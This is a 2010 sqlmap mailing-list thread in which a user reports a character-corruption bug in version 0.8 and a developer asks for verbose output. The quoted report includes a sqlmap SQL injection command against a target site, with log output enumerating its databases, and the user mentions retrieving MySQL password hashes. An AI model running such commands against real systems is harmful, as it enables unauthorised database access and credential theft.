Re: [sqlmap-users] sqlmap .8 bug - Windows
Brought to you by:
inquisb
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-18 09:46:25
|
Brandon, I can't reproduce it, it works just fine for me. Can you please provide us with the full output with -v 5 please? Also, try with --threads and without from the latest version on subversion repository. Regards, Bernardo On Wed, Mar 17, 2010 at 18:47, Brandon <bmu...@gm...> wrote: > Well there is a bug when retrieving the databases. When retrieving the > databases it tends to retrieve the wrong characters. This bug also is when > retrieving the mysql passwords. The program has spaces in some of the hashes > as well as "@" in 1 of the passwords. I am on windows xp pro SP3. Here is an > example of retrieving one of the wrong characters in the DB name. Mind you > .7 worked without any issues grabbing DB's and grabbing mysql passwords. > > C:\sqlmap8>sqlmap -u vulnsite.com/sites.php?site_id=130 --dbs > > sqlmap/0.8 - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 13:31:01 > > [13:31:01] [INFO] using 'C:\sqlmap8\output\vulnsite.com\session' as sessi > on file > [13:31:01] [INFO] resuming match ratio '0.968' from session file > [13:31:01] [INFO] resuming injection point 'GET' from session file > [13:31:01] [INFO] resuming injection parameter 'site_id' from session file > [13:31:01] [INFO] resuming injection type 'numeric' from session file > [13:31:01] [INFO] resuming 0 number of parenthesis from session file > [13:31:01] [INFO] resuming back-end DBMS 'mysql 5' from session file > [13:31:01] [INFO] testing connection to the target url > [13:31:05] [INFO] testing for parenthesis on injectable parameter > [13:31:05] [INFO] the back-end DBMS is MySQL > web server operating system: Linux Fedora 5 (Bordeaux) > web application technology: Apache 2.2.0, PHP 5.2.1 > back-end DBMS: MySQL 5 > > [13:31:05] [INFO] fetching database names > [13:31:05] [INFO] fetching number of databases > [13:31:05] [INFO] retrieved: 21 > [13:33:01] [INFO] retrieved: informa`ion_schema > > Thanks -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |